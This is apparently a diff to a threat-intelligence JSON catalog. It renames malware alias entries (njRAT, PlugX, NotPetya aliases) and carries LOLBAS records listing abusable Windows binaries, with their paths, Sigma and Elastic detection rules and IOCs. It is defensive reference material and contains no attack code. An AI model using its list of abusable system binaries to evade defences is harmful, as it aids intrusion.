- Associated Software" }, { "description": "[Netwalker](https://app.tidalcyber.com/software/5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d) is fileless ransomware written in PowerShell and executed directly in memory.[[TrendMicro Netwalker May 2020](https://app.tidalcyber.com/references/ceda9ef6-e609-4a34-9db1-d2a3ebffb679)]", @@ -19708,7 +19708,7 @@ } ], "uuid": "69d00742-0a78-44e9-ae0e-98d09f52d81d", - "value": "Backdoor.Nidiran" + "value": "Backdoor.Nidiran - Associated Software" }, { "description": "[Nidiran](https://app.tidalcyber.com/software/3ae9acd7-39f8-45c6-b557-c7d9a40eed2c) is a custom backdoor developed and used by [Suckfly](https://app.tidalcyber.com/groups/06549082-ff70-43bf-985e-88c695c7113c). It has been delivered via strategic web compromise. [[Symantec Suckfly March 2016](https://app.tidalcyber.com/references/8711c175-e405-4cb0-8c86-8aaa471e5573)]", @@ -19776,7 +19776,7 @@ } ], "uuid": "f6269ef2-ec83-41f6-9c86-4d507070c7d7", - "value": "Njw0rm" + "value": "Njw0rm - Associated Software" }, { "description": "[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)]", @@ -19790,7 +19790,7 @@ } ], "uuid": "abeccf73-8340-44ca-93eb-4fbd98050cb6", - "value": "LV" + "value": "LV - Associated Software" }, { "description": "[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)][[Trend Micro njRAT 2018](https://app.tidalcyber.com/references/d8e7b428-84dd-4d96-b3f3-70e7ed7f8271)]", @@ -19804,7 +19804,7 @@ } ], "uuid": "77fe7b25-a1a1-488f-b0af-08e6e1508301", - "value": "Bladabindi" + "value": "Bladabindi - Associated Software" }, { "description": "[njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)]", @@ -19940,7 +19940,7 @@ } ], "uuid": "b1dc73c7-6591-430b-9802-5b66758f787c", - "value": "nmap.exe" + "value": "nmap.exe - Associated Software" }, { "description": "According to its project website, \"Nmap (\"Network Mapper\") is a free and open source utility for network discovery and security auditing\".[[Nmap: the Network Mapper](/references/65f1bbaa-8ad1-4ad5-b726-660558d27efc)]", @@ -20026,7 +20026,7 @@ } ], "uuid": "f9b55f54-e33d-4df3-987e-fc10919f9a4d", - "value": "Diskcoder.C" + "value": "Diskcoder.C - Associated Software" }, { "description": "[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)][[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)]", @@ -20040,7 +20040,7 @@ } ], "uuid": "cfd041ef-c3f4-4a5e-92dc-4fd9b627983f", - "value": "Petrwrap" + "value": "Petrwrap - Associated Software" }, { "description": "[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]", @@ -20054,7 +20054,7 @@ } ], "uuid": "2f3dc4fc-1f8c-40e2-a241-9edd349e24d6", - "value": "GoldenEye" + "value": "GoldenEye - Associated Software" }, { "description": "[[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)]", @@ -20068,7 +20068,7 @@ } ], "uuid": "544d9871-b68a-4bb1-99a4-c56777ce208e", - "value": "ExPetr" + "value": "ExPetr - Associated Software" }, { "description": "[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]", @@ -20082,7 +20082,7 @@ } ], "uuid": "2b7f9965-810d-4018-905d-8530af166fb6", - "value": "Nyetya" + "value": "Nyetya - Associated Software" }, { "description": "[NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) is malware that was used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)][[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)][[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)][[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]", @@ -20150,7 +20150,7 @@ } ], "uuid": "ed19a544-699c-43c2-a3bb-4503b220354f", - "value": "npcap.exe" + "value": "npcap.exe - Associated Software" }, { "description": "According to its project website, \"Npcap is the Nmap Project's packet capture (and sending) library for Microsoft Windows\".[[Npcap: Windows Packet Capture Library & Driver](/references/c8dc5650-eb37-4bb6-b5b7-e6269c79785c)] Nmap is a utility used for network discovery and security auditing.", @@ -20192,7 +20192,7 @@ } ], "uuid": "39494b87-38c0-4b84-89c9-3bcd45f3bc3f", - "value": "ntdsutil.exe" + "value": "ntdsutil.exe - Associated Software" }, { "description": "Ntdsutil is a Windows command-line tool \"that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS).\"[[Ntdsutil Microsoft](/references/34de2f08-0481-4894-80ef-86506d821cf0)]", @@ -20342,7 +20342,7 @@ } ], "uuid": "b227bbff-8291-4e0d-950d-93785e4058ee", - "value": "Odbcconf.exe" + "value": "Odbcconf.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used in Windows for managing ODBC connections\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\odbcconf.exe\n* C:\\Windows\\SysWOW64\\odbcconf.exe\n\n**Resources:**\n* [https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b](https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b)\n* [https://github.com/woanware/application-restriction-bypasses](https://github.com/woanware/application-restriction-bypasses)\n* [https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/](https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/)\n\n**Detection:**\n* Sigma: [proc_creation_win_odbcconf_response_file.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml)\n* Sigma: [proc_creation_win_odbcconf_response_file_susp.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)[[LOLBAS Odbcconf](/references/febcaaec-b535-4347-a4c7-b3284b251897)]", @@ -20389,7 +20389,7 @@ } ], "uuid": "bc428876-7d48-4a33-a080-77916fc66ebc", - "value": "OfflineScannerShell.exe" + "value": "OfflineScannerShell.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Defender Offline Shell\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbas_offlinescannershell.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml)\n* IOC: OfflineScannerShell.exe should not be run on a normal workstation[[OfflineScannerShell.exe - LOLBAS Project](/references/8194442f-4f86-438e-bd0c-f4cbda0264b8)]", @@ -20457,7 +20457,7 @@ } ], "uuid": "b710376a-55b9-44c5-8200-c43d2753e16a", - "value": "Sasfis" + "value": "Sasfis - Associated Software" }, { "description": "[OLDBAIT](https://app.tidalcyber.com/software/479814e2-2656-4ea2-9e79-fcdb818f703e) is a credential harvester used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). [[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -20533,7 +20533,7 @@ } ], "uuid": "b893fa8c-a561-4e33-b1f5-fb2b176530df", - "value": "OneDriveStandaloneUpdater.exe" + "value": "OneDriveStandaloneUpdater.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** OneDrive Standalone Updater\n\n**Author:** Elliot Killick\n\n**Paths:**\n* %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\n\n**Resources:**\n* [https://github.com/LOLBAS-Project/LOLBAS/pull/153](https://github.com/LOLBAS-Project/LOLBAS/pull/153)\n\n**Detection:**\n* IOC: HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL\n* IOC: Reports of downloading from suspicious URLs in %localappdata%\\OneDrive\\setup\\logs\\StandaloneUpdate_*.log files\n* Sigma: [registry_set_lolbin_onedrivestandaloneupdater.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml)[[OneDriveStandaloneUpdater.exe - LOLBAS Project](/references/3d7dcd68-a7b2-438c-95bb-b7523a39c6f7)]", @@ -20632,7 +20632,7 @@ } ], "uuid": "a3c7988f-9ac2-4f7a-ab9d-eb91e905e7a0", - "value": "OpenConsole.exe" + "value": "OpenConsole.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Console Window host for Windows Terminal\n\n**Author:** Nasreddine Bencherchali\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe\n\n**Resources:**\n* [https://twitter.com/nas_bench/status/1537563834478645252](https://twitter.com/nas_bench/status/1537563834478645252)\n\n**Detection:**\n* IOC: OpenConsole.exe spawning unexpected processes\n* Sigma: [proc_creation_win_lolbin_openconsole.yml](https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml)[[OpenConsole.exe - LOLBAS Project](/references/e597522a-68ac-4d7e-80c4-db1c66d2da04)]", @@ -20673,7 +20673,7 @@ } ], "uuid": "aa558e34-f3ca-443e-b067-a6a88ee46cf6", - "value": "AIRBREAK" + "value": "AIRBREAK - Associated Software" }, { "description": "[Orz](https://app.tidalcyber.com/software/45a52a29-00c0-458a-b705-1040e06a43f2) is a custom JavaScript backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. [[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)] [[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", @@ -20744,7 +20744,7 @@ } ], "uuid": "f89703da-6631-4e60-be1c-0ecbe5a6f738", - "value": "Backdoor.MacOS.OCEANLOTUS.F" + "value": "Backdoor.MacOS.OCEANLOTUS.F - Associated Software" }, { "description": "[OSX_OCEANLOTUS.D](https://app.tidalcyber.com/software/a45904b5-0ada-4567-be4c-947146c7f574) is a macOS backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). First discovered in 2015, [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) has continued to make improvements using a plugin architecture to extend capabilities, specifically using `.dylib` files. [OSX_OCEANLOTUS.D](https://app.tidalcyber.com/software/a45904b5-0ada-4567-be4c-947146c7f574) can also determine it's permission level and execute according to access type (`root` or `user`).[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)][[TrendMicro MacOS April 2018](https://app.tidalcyber.com/references/e18ad1a7-1e7e-4aca-be9b-9ee12b41c147)][[Trend Micro MacOS Backdoor November 2020](https://app.tidalcyber.com/references/43726cb8-a169-4594-9323-fad65b9bae97)]", @@ -20790,7 +20790,7 @@ } ], "uuid": "b7c33058-21b0-46df-988c-88dfab53e83a", - "value": "Zshlayer" + "value": "Zshlayer - Associated Software" }, { "description": "[[Intego Shlayer Apr 2018](https://app.tidalcyber.com/references/3ca1254c-db51-4a5d-8242-ffd9e4481c22)][[Malwarebytes Crossrider Apr 2018](https://app.tidalcyber.com/references/80530288-26a3-4c3e-ace1-47510df10fbd)]", @@ -20804,7 +20804,7 @@ } ], "uuid": "1420094e-351e-4294-b59b-52d2da2724b8", - "value": "Crossrider" + "value": "Crossrider - Associated Software" }, { "description": "[OSX/Shlayer](https://app.tidalcyber.com/software/4d91d625-21d8-484a-b63f-0a3daa4ed434) is a Trojan designed to install adware on macOS that was first discovered in 2018.[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)][[Intego Shlayer Feb 2018](https://app.tidalcyber.com/references/46eb883c-e203-4cd9-8f1c-c6ea12bc2742)]", @@ -20922,7 +20922,7 @@ } ], "uuid": "a9205e41-8ef6-4b3a-9477-f6b673668d11", - "value": "Peer-to-Peer ZeuS" + "value": "Peer-to-Peer ZeuS - Associated Software" }, { "description": "", @@ -20936,7 +20936,7 @@ } ], "uuid": "af301e1b-5252-41eb-8802-9c5129d40091", - "value": "Gameover ZeuS" + "value": "Gameover ZeuS - Associated Software" }, { "description": "[P2P ZeuS](https://app.tidalcyber.com/software/916f8a7c-e487-4446-b6ee-c8da712a9569) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. [[Dell P2P ZeuS](https://app.tidalcyber.com/references/773d1d91-a93c-4bb3-928b-4c3f82f2c889)]", @@ -20979,7 +20979,7 @@ } ], "uuid": "42353f34-77f6-4928-ae59-e3c9518ef1ba", - "value": "HEAVYPOT" + "value": "HEAVYPOT - Associated Software" }, { "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -20993,7 +20993,7 @@ } ], "uuid": "d1748d73-27f8-4bf1-a8cf-fcc82cebffbc", - "value": "GreetCake" + "value": "GreetCake - Associated Software" }, { "description": "[P8RAT](https://app.tidalcyber.com/software/1933ad3d-3085-4b1b-82b9-ac51b440e2bf) is a fileless malware used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) to download and execute payloads since at least 2020.[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -21177,7 +21177,7 @@ } ], "uuid": "0d76d9ee-8696-42f9-9f34-52f3ad265995", - "value": "Fobushell" + "value": "Fobushell - Associated Software" }, { "description": "[P.A.S. Webshell](https://app.tidalcyber.com/software/4d79530c-2fd9-4438-a8da-74f42119695a) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.[[ANSSI Sandworm January 2021](https://app.tidalcyber.com/references/5e619fef-180a-46d4-8bf5-998860b5ad7e)]", @@ -21255,7 +21255,7 @@ } ], "uuid": "4a3504d3-5ff3-4aa1-8894-74fabf92d922", - "value": "Pcalua.exe" + "value": "Pcalua.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Program Compatibility Assistant\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\pcalua.exe\n\n**Resources:**\n* [https://twitter.com/KyleHanslovan/status/912659279806640128](https://twitter.com/KyleHanslovan/status/912659279806640128)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_pcalua.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml)[[Pcalua.exe - LOLBAS Project](/references/958064d4-7f9f-46a9-b475-93d6587ed770)]", @@ -21354,7 +21354,7 @@ } ], "uuid": "3bc797f7-59bc-4ce6-8cf9-e533e317aaa8", - "value": "Pcwrun.exe" + "value": "Pcwrun.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Program Compatibility Wizard\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\pcwrun.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/991335019833708544](https://twitter.com/pabraeken/status/991335019833708544)\n* [https://twitter.com/nas_bench/status/1535663791362519040](https://twitter.com/nas_bench/status/1535663791362519040)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_pcwrun_follina.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml)[[Pcwrun.exe - LOLBAS Project](/references/b5946ca4-1f1b-4cba-af2f-0b99d6fff8b0)]", @@ -21397,7 +21397,7 @@ } ], "uuid": "f464e0cd-7a76-4924-9473-90f334f886ce", - "value": "Pcwutl.dll" + "value": "Pcwutl.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft HTML Viewer\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\pcwutl.dll\n* c:\\windows\\syswow64\\pcwutl.dll\n\n**Resources:**\n* [https://twitter.com/harr0ey/status/989617817849876488](https://twitter.com/harr0ey/status/989617817849876488)\n* [https://windows10dll.nirsoft.net/pcwutl_dll.html](https://windows10dll.nirsoft.net/pcwutl_dll.html)\n\n**Detection:**\n* Analysis: [https://redcanary.com/threat-detection-report/techniques/rundll32/](https://redcanary.com/threat-detection-report/techniques/rundll32/)\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Pcwutl.dll - LOLBAS Project](/references/1050758d-20da-4c4a-83d3-40aeff3db9ca)]", @@ -21468,7 +21468,7 @@ } ], "uuid": "e7c7c852-6196-49e9-b883-ccfd5ae47aca", - "value": "Penquin 2.0" + "value": "Penquin 2.0 - Associated Software" }, { "description": "[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]", @@ -21482,7 +21482,7 @@ } ], "uuid": "42c40368-672c-4118-bd35-9935208978e1", - "value": "Penquin_x64" + "value": "Penquin_x64 - Associated Software" }, { "description": "[Penquin](https://app.tidalcyber.com/software/951fad62-f636-4c01-b924-bb0ce87f5b20) is a remote access trojan (RAT) with multiple versions used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target Linux systems since at least 2014.[[Kaspersky Turla Penquin December 2014](https://app.tidalcyber.com/references/957edb5c-b893-4968-9603-1a6b8577f3aa)][[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]", @@ -21556,7 +21556,7 @@ } ], "uuid": "3c004ca1-7436-44e9-85e4-33d55fc74f5e", - "value": "Pester.bat" + "value": "Pester.bat - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used as part of the Powershell pester\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\bin\\Pester.bat\n* c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*\\bin\\Pester.bat\n\n**Resources:**\n* [https://twitter.com/Oddvarmoe/status/993383596244258816](https://twitter.com/Oddvarmoe/status/993383596244258816)\n* [https://twitter.com/_st0pp3r_/status/1560072680887525378](https://twitter.com/_st0pp3r_/status/1560072680887525378)\n* [https://twitter.com/_st0pp3r_/status/1560072680887525378](https://twitter.com/_st0pp3r_/status/1560072680887525378)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_pester_1.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml)[[Pester.bat - LOLBAS Project](/references/93f281f6-6fcc-474a-b222-b303ea417a18)]", @@ -21891,7 +21891,7 @@ } ], "uuid": "c29799e7-8d70-4312-890d-39eff939af8c", - "value": "Pktmon.exe" + "value": "Pktmon.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Capture Network Packets on the windows 10 with October 2018 Update or later.\n\n**Author:** Derek Johnson\n\n**Paths:**\n* c:\\windows\\system32\\pktmon.exe\n* c:\\windows\\syswow64\\pktmon.exe\n\n**Resources:**\n* [https://binar-x79.com/windows-10-secret-sniffer/](https://binar-x79.com/windows-10-secret-sniffer/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_pktmon.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml)\n* IOC: .etl files found on system[[Pktmon.exe - LOLBAS Project](/references/8f0ad4ed-869b-4332-b091-7551262cff29)]", @@ -21983,7 +21983,7 @@ } ], "uuid": "d7602f4b-ebea-466b-9e7f-17fe5e7238d6", - "value": "PuTTY Link" + "value": "PuTTY Link - Associated Software" }, { "description": "Plink is a tool used to automate Secure Shell (SSH) actions on Windows.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", @@ -22043,7 +22043,7 @@ } ], "uuid": "c0090129-1ec8-46c2-94da-7094a1d1e8ca", - "value": "DestroyRAT" + "value": "DestroyRAT - Associated Software" }, { "description": "[[Lastline PlugX Analysis](https://app.tidalcyber.com/references/9f7fa262-cede-4f47-94ca-1534c65c86e2)][[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)][[CIRCL PlugX March 2013](https://app.tidalcyber.com/references/8ab89236-6994-43a3-906c-383e294f65d1)]", @@ -22057,7 +22057,7 @@ } ], "uuid": "c3f88c02-a063-443a-a555-c582639f648c", - "value": "Sogu" + "value": "Sogu - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -22071,7 +22071,7 @@ } ], "uuid": "6795a6c5-8701-4fbd-b8f4-ff0b5bd04cc2", - "value": "Thoper" + "value": "Thoper - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -22085,7 +22085,7 @@ } ], "uuid": "cca25e4e-d315-49e2-bfc1-be1ee4fac071", - "value": "TVT" + "value": "TVT - Associated Software" }, { "description": "[[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)]", @@ -22099,7 +22099,7 @@ } ], "uuid": "6fb9ef48-3016-4f37-8254-1ae52022b6da", - "value": "Kaba" + "value": "Kaba - Associated Software" }, { "description": "[[Lastline PlugX Analysis](https://app.tidalcyber.com/references/9f7fa262-cede-4f47-94ca-1534c65c86e2)][[CIRCL PlugX March 2013](https://app.tidalcyber.com/references/8ab89236-6994-43a3-906c-383e294f65d1)]", @@ -22113,7 +22113,7 @@ } ], "uuid": "7ae0cf0a-daad-490c-90da-fe0e1f09a31c", - "value": "Korplug" + "value": "Korplug - Associated Software" }, { "description": "[PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.[[Lastline PlugX Analysis](https://app.tidalcyber.com/references/9f7fa262-cede-4f47-94ca-1534c65c86e2)][[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)][[New DragonOK](https://app.tidalcyber.com/references/82c1ed0d-a41d-4212-a3ae-a1d661bede2d)][[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]", @@ -22254,7 +22254,7 @@ } ], "uuid": "6f09dbde-ae7a-4781-b317-286da2c88003", - "value": "Pnputil.exe" + "value": "Pnputil.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used for installing drivers\n\n**Author:** Hai vaknin (lux)\n\n**Paths:**\n* C:\\Windows\\system32\\pnputil.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml)[[Pnputil.exe - LOLBAS Project](/references/21d0419a-5454-4808-b7e6-2b1b9de08ed6)]", @@ -22316,7 +22316,7 @@ } ], "uuid": "76cb912d-02e3-4f99-8cde-6f9b3f75f752", - "value": "Breut" + "value": "Breut - Associated Software" }, { "description": "[[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)] [[Symantec Darkmoon Sept 2014](https://app.tidalcyber.com/references/3362a507-03c3-4236-b484-8144248b5cac)]", @@ -22330,7 +22330,7 @@ } ], "uuid": "5f9d7b30-b187-4437-8214-e6e966958553", - "value": "Poison Ivy" + "value": "Poison Ivy - Associated Software" }, { "description": "[[Symantec Darkmoon Sept 2014](https://app.tidalcyber.com/references/3362a507-03c3-4236-b484-8144248b5cac)]", @@ -22344,7 +22344,7 @@ } ], "uuid": "69b67620-b26e-42d3-bb65-b9a3fc734d19", - "value": "Darkmoon" + "value": "Darkmoon - Associated Software" }, { "description": "[PoisonIvy](https://app.tidalcyber.com/software/1d87a695-7989-49ae-ac1a-b6601db565c3) is a popular remote access tool (RAT) that has been used by many groups.[[FireEye Poison 